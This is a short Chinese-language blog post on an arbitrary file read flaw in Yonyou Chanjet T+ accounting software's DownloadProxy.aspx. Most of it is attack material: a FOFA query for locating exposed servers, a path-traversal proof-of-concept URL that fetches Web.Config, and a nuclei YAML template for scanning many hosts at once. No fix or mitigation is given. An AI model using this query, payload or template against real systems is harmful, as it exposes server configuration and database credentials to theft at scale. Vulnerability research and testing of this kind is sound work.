用友畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞

漏洞描述

用友 畅捷通T+ DownloadProxy.aspx文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器上的敏感文件

漏洞复现

fofa语法:app="畅捷通-TPlus"
登录页面如下

POC:
/tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Config

nuclei批量yaml文件

id: yonyou_changjietong_DownloadProxy_readfile

info:
  name: yonyou_changjietong_DownloadProxy_readfile
  author: bjx
  severity: high
  tags: yonyou,changjietong,yonyouoa,oa
requests:
  - method: GET
    path:
      - "{{BaseURL}}/tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Config"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "SYSTEMDB"
          - "ProductInfo"
          - "<?xml"
        part: body
        condition: and

      - type: status
        status:
          - 200
posted @ 2023-09-07 14:01  学安全的小白  阅读(508)  评论(0编辑  收藏  举报